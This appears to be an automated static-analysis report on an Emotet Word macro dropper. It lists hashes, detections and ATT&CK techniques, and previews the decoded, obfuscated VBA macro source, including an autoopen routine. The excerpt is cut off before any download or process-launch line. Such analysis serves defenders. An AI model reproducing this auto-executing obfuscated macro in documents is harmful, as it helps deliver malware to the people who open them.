Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7b492a6aa0b683eb…

MALICIOUS

Office (OLE)

148.8 KB Created: 2019-05-02 16:38:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 157535a2bffd27ed82eb4fac64bd8bdc SHA-1: f90a46b60567a7bb0f64b86eec47a7ad7c65e391 SHA-256: 7b492a6aa0b683eb1c70b5363eb6649a63b0cf81cf23c8534546d71a762be37c
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Application Startup: Office Application

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emotet-6960272-0'. Heuristics indicate the presence of legacy WordBasic auto-exec macros and VBA macros, specifically an 'AutoOpen' macro. Critically, the VBA code utilizes WMI (Win32_Process) to launch a process, a common technique for downloading and executing further stages of malware. The presence of an 'autoopen' marker and the WMI process creation strongly suggest this document is designed to execute malicious code upon opening.

Heuristics 7

  • ClamAV: Doc.Dropper.Emotet-6960272-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31128 bytes
SHA-256: 9b6ef2b31a24f2c878c1e0a7e1d686e90dd81268dd00ad81c90de28a051389f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z03201"

Attribute VB_Name = "C37266_"

Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
   Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
   Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
   Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
   Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
   Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
   Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
   Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
   Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
   Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
   Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
   Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub

Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
   Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
   Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)

... (truncated)